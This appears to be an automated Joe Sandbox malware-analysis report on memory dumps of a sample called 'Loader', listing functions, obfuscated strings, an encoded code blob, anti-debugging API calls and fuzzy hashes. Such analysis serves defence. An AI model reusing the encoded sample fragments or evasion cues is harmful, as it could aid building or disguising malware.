Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 32ec0667700a42db22a7d160a44e94e1af429eeaa6ec005c3e0197386c39e1e8
Instruction ID: 7d5ba6389f9b6cd0ad95f388720754e4a21367a496d9ed58d2f08118c590b71a
Opcode Fuzzy Hash: 32ec0667700a42db22a7d160a44e94e1af429eeaa6ec005c3e0197386c39e1e8
Instruction Fuzzy Hash: B0E065216442665BEF112EA6DF0876F7668BF427F0F55493AAF14A61D0CB60DE0082E3

Non-executed Functions

Function 6D7D6E90 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 212COMMON

Download Yara Rule

Strings

yAQ, xrefs: 6D7D7098
yAQ, xrefs: 6D7D715E

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: yAQ$yAQ
API String ID: 0-801701766
Opcode ID: 0ce0685397c6ae20e188f4f3321cf4eee133a43dce1fdde976f30674eb954822
Instruction ID: 93c137d30d7fb8443b89031863d4be39c5e3a26e13edcc8e00773ed6479da511
Opcode Fuzzy Hash: 0ce0685397c6ae20e188f4f3321cf4eee133a43dce1fdde976f30674eb954822
Instruction Fuzzy Hash: F7611872E545068FDB05CE7CCA853DE77F1AB46330F14C225D411DB344C6369A4ACB92

Function 6D7BD750 Relevance: 6.7, Strings: 5, Instructions: 479COMMON

Download Yara Rule

Strings

//8zMzMzMzMzMzMzMzMzMVVNXVoPsKLj/////hckPhNkDAACLcQROg/4FD4fMAwAAi3wkRIl8JBiLfCRA/yS1dGlEALgEAAAAhdIPhKwDAADHAm51bGzGQgQA6Z0DAACLcQiF9g+EQQEAAItOCIXSD4RAAQAAZscCWwCJ+I16AcdEJBAAAAAAuwEAAACFwA+VRCQED4Q2AQAAhckPhC4BAABmx0IBCgCDwgLGRCQEAbsCAAAAidewAYlEJBDpFgEAAN1, xrefs: 6D7BD84F, 6D7BDC95
+[.y, xrefs: 6D7BDD85
vjjbylzahowdkllnhnpafbydrvngntyb, xrefs: 6D7BD9E5
+[.y, xrefs: 6D7BDD2F
gzfouwijrnbiqfjq, xrefs: 6D7BD9A7

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: +[.y$+[.y$//8zMzMzMzMzMzMzMzMzMVVNXVoPsKLj/////hckPhNkDAACLcQROg/4FD4fMAwAAi3wkRIl8JBiLfCRA/yS1dGlEALgEAAAAhdIPhKwDAADHAm51bGzGQgQA6Z0DAACLcQiF9g+EQQEAAItOCIXSD4RAAQAAZscCWwCJ+I16AcdEJBAAAAAAuwEAAACFwA+VRCQED4Q2AQAAhckPhC4BAABmx0IBCgCDwgLGRCQEAbsCAAAAidewAYlEJBDpFgEAAN1$gzfouwijrnbiqfjq$vjjbylzahowdkllnhnpafbydrvngntyb
API String ID: 0-2863910153
Opcode ID: 4ef30be61cb9ae04d050181d02ca3b6ac281671e8db15cfcd84ef05e46135407
Instruction ID: 6936817734ca8acf4b480406dd5f257ab7e2b17c21c895052a650452432fd13d
Opcode Fuzzy Hash: 4ef30be61cb9ae04d050181d02ca3b6ac281671e8db15cfcd84ef05e46135407
Instruction Fuzzy Hash: E702D575654B018FC725CE3CC6947977BF2BB86320B048A1ED5A38BA94C735E409CB86

Function 6D7DED57 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6D7DED63
IsDebuggerPresent.KERNEL32 ref: 6D7DEE2F
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D7DEE48
UnhandledExceptionFilter.KERNEL32(?), ref: 6D7DEE52

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 1212288e7f32a4a049fddb2c0f7cb3e52530795a1e474ec9e00420e6cb01e25a
Instruction ID: 85ad864ed2ec583c882f841dbfcdfdd9f9df791d533bb1ef5654a811326a5345
Opcode Fuzzy Hash: 1212288e7f32a4a049fddb2c0f7cb3e52530795a1e474ec9e00420e6cb01e25a
Instruction Fuzzy Hash: 453116B5D0531DDBDF61DFA0C9497CDBBB8AF08300F1041AAE54CAB250EB719A848F46

Function 6D7DA3D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

vector too long, xrefs: 6D7DA4D6, 6D7DA60C

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: vector too long
API String ID: 0-2873823879
Opcode ID: 22bd9731f894bbb341c5669146e2429b84ef5f0d1f161f07ed919a269946c052
Instruction ID: 065ef7ea8d6688eea6fc7ea04be91f6fe364ff670ffcf2b525d03800aece40c2
Opcode Fuzzy Hash: 22bd9731f894bbb341c5669146e2429b84ef5f0d1f161f07ed919a269946c052
Instruction Fuzzy Hash: CA512A32E501168FCB45CA7CC699BEE7BF2BB56334F119626C8619B381C3268909C797

Function 6D7CC0D0 Relevance: 5.3, Strings: 4, Instructions: 288COMMON

Download Yara Rule

Strings

jO3N, xrefs: 6D7CC378
U;j@, xrefs: 6D7CC2DE
U;j@, xrefs: 6D7CC4B4
\)[, xrefs: 6D7CC284

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: U;j@$U;j@$\)[$jO3N
API String ID: 0-1053467548
Opcode ID: 5c9efe091d0733025bfa36551a7712c3aa8e18d0cc3816fb408ac71dccda067c
Instruction ID: 54757eae894f8314c322843639a7a2e4909b051bc2295dbb0c9a101d64bba8ef
Opcode Fuzzy Hash: 5c9efe091d0733025bfa36551a7712c3aa8e18d0cc3816fb408ac71dccda067c
Instruction Fuzzy Hash: 07A1D476A551068FDF05DEBCCA953EE7BF2BB46322F10851AC412D7354C6398A09CB93

Function 6D7E2C9D Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6D7E2D95
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6D7E2D9F
UnhandledExceptionFilter.KERNEL32(C00000EF,?,?,?,?,?,00000000), ref: 6D7E2DAC

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1a727727204c5d2cc6a20d38f15e96fccbcd62bdc90c3e279faf4a929fe5d626
Instruction ID: 4a9eda0164a886d0aab8e83bb00d7328dee111a3a9dda840d5126168f09056c6
Opcode Fuzzy Hash: 1a727727204c5d2cc6a20d38f15e96fccbcd62bdc90c3e279faf4a929fe5d626
Instruction Fuzzy Hash: C931F27490122D9BCB61DF24C9897DDBBB8BF08320F5041EAE51CA62A0E7709B85CF55

Function 6D7BCCE0 Relevance: 4.4, Strings: 3, Instructions: 677COMMON

Download Yara Rule

Strings

kkzvgcbsurflkpytybuomoevxtpltygyudjecinpfxskdlokkfsvvlvgqnmrm, xrefs: 6D7BD116
k)!, xrefs: 6D7BD3DF
), xrefs: 6D7BD400

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: )$k)!$kkzvgcbsurflkpytybuomoevxtpltygyudjecinpfxskdlokkfsvvlvgqnmrm
API String ID: 0-4019164981
Opcode ID: f45214f2955e536035c0116192fff2d3df0983e8e01fbfc9cf82a7d9f1dfa081
Instruction ID: ec3ce4f0fcfdaa6cfc0841ec4995819017d0ee34a910cc71802c2a7abc9e8233
Opcode Fuzzy Hash: f45214f2955e536035c0116192fff2d3df0983e8e01fbfc9cf82a7d9f1dfa081
Instruction Fuzzy Hash: 3E32E1762582028FC705CE7CD68879A7BE2EBC7364F00DA1EE452DB294D635C94ACB47

Function 6D7BB460 Relevance: 4.2, Strings: 3, Instructions: 500COMMON

Download Yara Rule

Strings

G, xrefs: 6D7BBB8F
kotnpbtbjstlxgelpivokyqdvxthaahacgqyrhqbjxycgjajumgwptnkrxdpszezzpumaq, xrefs: 6D7BB757, 6D7BBB7A
#, xrefs: 6D7BB869

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: #$G$kotnpbtbjstlxgelpivokyqdvxthaahacgqyrhqbjxycgjajumgwptnkrxdpszezzpumaq
API String ID: 0-1287920566
Opcode ID: 185a3019311271d82274c9f4a7abb0c0e5d86530a97bbf158c375ce7568010dc
Instruction ID: 196a8012c6f393121a20c286a0b8f03db154fbd57a16a691c7945170240736ac
Opcode Fuzzy Hash: 185a3019311271d82274c9f4a7abb0c0e5d86530a97bbf158c375ce7568010dc
Instruction Fuzzy Hash: 3002C172E542098FCB05CEBCC6D57DE7BF1BF56320F00951AD825AB298C275A909CF86

Function 6D7D8BA0 Relevance: 4.2, Strings: 3, Instructions: 424COMMON

Download Yara Rule

Strings

`ID:, xrefs: 6D7D8E39
>6'9, xrefs: 6D7D8BB8
>6'9, xrefs: 6D7D8EB5

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: >6'9$>6'9$`ID:
API String ID: 0-3243849139
Opcode ID: 4312bbe82304c645810d9f066de656113a909e7efb98378acf42be0efc0d07d0
Instruction ID: e15872de90b11335fae323156cce3525135d9e867c45fec202666ca55576c0f6
Opcode Fuzzy Hash: 4312bbe82304c645810d9f066de656113a909e7efb98378acf42be0efc0d07d0
Instruction Fuzzy Hash: A5E1D076E502059FCB48CEACDA947DDBBF2AB4A320F10D51AE824E7354C735994ACF42

Function 6D7D9450 Relevance: 3.5, Strings: 2, Instructions: 963COMMON

Download Yara Rule

Strings

t52, xrefs: 6D7D9D19
s.Mv, xrefs: 6D7D9AD5

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: s.Mv$t52
API String ID: 0-2151687386
Opcode ID: 1b228b871034141729bf336701b627ce592c0e1490355f544f1b9bee3c603d7c
Instruction ID: 5d9ffda653528d315c6558a4c3412505bccc53eee879785b928ec2c4c3eb6ca3
Opcode Fuzzy Hash: 1b228b871034141729bf336701b627ce592c0e1490355f544f1b9bee3c603d7c
Instruction Fuzzy Hash: 61728C75A146048FCB44CFACCAD4AEEBBF2BB9A320F108529E516DB354D735AC05CB51

Function 6D7D0E20 Relevance: 3.2, APIs: 2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d08611b7462706d90024d5be261ce7ea67f04cd9012d1ade9099797289f1450
Instruction ID: cb380b4f3646eb9db7e52764cf1ba9e80ad95e2c9e47d194884620d570e76c90
Opcode Fuzzy Hash: 6d08611b7462706d90024d5be261ce7ea67f04cd9012d1ade9099797289f1450
Instruction Fuzzy Hash: 2F513932A601124FCF48DE3CCA983EE37F2AB46370F115619D924DF384C6268909CBD2

Function 6D7CAAC0 Relevance: 3.1, Strings: 2, Instructions: 649COMMON

Download Yara Rule

Strings

Pm, xrefs: 6D7CAFE7
Pm, xrefs: 6D7CB070

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: Pm$Pm
API String ID: 0-614183269
Opcode ID: 7096872a666bc06beab6a6e9d60779b50c59d6007078f4d935be9c195bd97a32
Instruction ID: 2c01eb7bb002f05add51643f01b59e4dace93474a2851d7acee2234664a7dc95
Opcode Fuzzy Hash: 7096872a666bc06beab6a6e9d60779b50c59d6007078f4d935be9c195bd97a32
Instruction Fuzzy Hash: BD32A076E142558FCB05CEBCDA85BEE7BB2FB46322F10851AE811AB354D7359809CB43

Function 6D7CDCB0 Relevance: 3.1, Strings: 2, Instructions: 599COMMON

Download Yara Rule

Strings

/u|F, xrefs: 6D7CE382
/u|F, xrefs: 6D7CE4A6

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: /u|F$/u|F
API String ID: 0-791141198
Opcode ID: 85775837f0996a718b0f5180d82b3b7b5245fc90dca0fca024b1f421a54e0c74
Instruction ID: 44422542044f3f3278cb75296cfbbb9a94b8bb88ba12e8703eea8fab1d1c5725
Opcode Fuzzy Hash: 85775837f0996a718b0f5180d82b3b7b5245fc90dca0fca024b1f421a54e0c74
Instruction Fuzzy Hash: 0622D076E502098FCB05CEACD6957EE7BF2BB86330F108529E811DB394D6359949CB42

Function 6D7D32E0 Relevance: 3.0, Strings: 2, Instructions: 495COMMON

Download Yara Rule

Strings

,o, xrefs: 6D7D39A1
,o, xrefs: 6D7D36E6

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: ,o$,o
API String ID: 0-3835555416
Opcode ID: 11cdb0fc6c51ef1f63db1565dc11c4f5cccd46dbf6fe1f2896771c136ce58d61
Instruction ID: 1690d44aedead3f24321ad94ae18c4dc049e2ff5b842ebb22f14c4312ee45e5e
Opcode Fuzzy Hash: 11cdb0fc6c51ef1f63db1565dc11c4f5cccd46dbf6fe1f2896771c136ce58d61
Instruction Fuzzy Hash: F502C171E542058FCF45CEBCC6953DE7BF1BB0A364F158226D429EB394C6369806CB86

Function 6D7D3C00 Relevance: 2.9, Strings: 2, Instructions: 448COMMON

Download Yara Rule

Strings

6uh%, xrefs: 6D7D4090
5mS, xrefs: 6D7D40EA

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: 5mS$6uh%
API String ID: 0-1650046608
Opcode ID: eb4901d73c32fdec3ad8e01a7e1cae837e1c8e818403016b7d7027a25b7a1ec0
Instruction ID: 0178a686f43eb475f101b475266be9b03e2025eb8cf0137fa8060b6d0587f701
Opcode Fuzzy Hash: eb4901d73c32fdec3ad8e01a7e1cae837e1c8e818403016b7d7027a25b7a1ec0
Instruction Fuzzy Hash: 1CF1A032A54205DFDF45CEECE6887DD7BF2BB4A364F108216E820EB394D3269945DB42

Function 6D7B25D0 Relevance: 2.9, Strings: 2, Instructions: 416COMMON

Download Yara Rule

Strings

tqqyabwloxpcoeujhiyqpqjjsyhywekzohfjazo, xrefs: 6D7B29AC, 6D7B2B1C
mkaxsyfogrgrdhpperldmhsihxuzjjdmcnumuednsdbgnfikyfkwkwdlebelrsrxvahlkbm, xrefs: 6D7B2974, 6D7B2AE5

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: mkaxsyfogrgrdhpperldmhsihxuzjjdmcnumuednsdbgnfikyfkwkwdlebelrsrxvahlkbm$tqqyabwloxpcoeujhiyqpqjjsyhywekzohfjazo
API String ID: 0-1242157523
Opcode ID: 67a3016b10d13b6c86e203df247862e4215ac8ae4a7d899b02251d18018b417e
Instruction ID: 46064b0a386e2b63d62e74ccda6fd808b1ccfe1e9ac36a63e56a594f5db7e97c
Opcode Fuzzy Hash: 67a3016b10d13b6c86e203df247862e4215ac8ae4a7d899b02251d18018b417e
Instruction Fuzzy Hash: 0DE1D175610B018FC725CE3CC695397B7F6BB86324B009A2AD996CBB50DB35F849CB42

Function 6D7CA4B0 Relevance: 2.9, Strings: 2, Instructions: 416COMMONLIBRARYCODE

Download Yara Rule

Strings

eDN, xrefs: 6D7CAA95
eDN, xrefs: 6D7CA73A

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: eDN$eDN
API String ID: 0-1779612991
Opcode ID: 24a639a51da0276cf33f688bf7d4655d13b9d27d50a41b621f08d86b77aea713
Instruction ID: ead5bdf7bf09e826e63ddc976073ff03c7e2449988cd09ab166dfbc879ab84a3
Opcode Fuzzy Hash: 24a639a51da0276cf33f688bf7d4655d13b9d27d50a41b621f08d86b77aea713
Instruction Fuzzy Hash: 74E1DD71E5424A8FCB058EACD691BDD7BF2BB4A326F00D126E825EB354C6399804CF57

Function 6D7D5030 Relevance: 2.7, Strings: 2, Instructions: 222COMMON

Download Yara Rule

Strings

bad array new length, xrefs: 6D7D5250, 6D7D5308
Y}m0^}m, xrefs: 6D7D5264, 6D7D531C

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: bad array new length$Y}m0^}m
API String ID: 0-1779474587
Opcode ID: e23759e85b5e4cdffaa1697934f92e7cbd9f1032143d2d29ee0fdd19ea8d4223
Instruction ID: 456ca2367dff2641d162ff2745f32bad819854aa31a85c8a12a32d53ecf33ec5
Opcode Fuzzy Hash: e23759e85b5e4cdffaa1697934f92e7cbd9f1032143d2d29ee0fdd19ea8d4223
Instruction Fuzzy Hash: AA71DF75A046068FCB09CE7CE6947FE7BF1FB4B364F105529D412AB344C636990ACB92

Function 6D7D42F0 Relevance: 1.9, Strings: 1, Instructions: 643COMMON

Download Yara Rule

Strings

E., xrefs: 6D7D4B44

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID:
String ID: E.
API String ID: 0-3950391977
Opcode ID: 4c3b879b7f225f13435154280815cb2fe0fcb15b6a15cd13744334ea6f75d86e
Instruction ID: e7eef38b1c4a8028fb2f3fb648f5c8b0569f100d5ec93e8c97f3e04cdc2a0667
Opcode Fuzzy Hash: 4c3b879b7f225f13435154280815cb2fe0fcb15b6a15cd13744334ea6f75d86e
Instruction Fuzzy Hash: 52220732E641058FCF498F7CCA997DE77F2BB4A378F10D21AD521EB294C2299405EB52

Function 6D7EB1B5 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D7EB1B0,?,?,00000008,?,?,6D7EADB3,00000000), ref: 6D7EB3E2

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

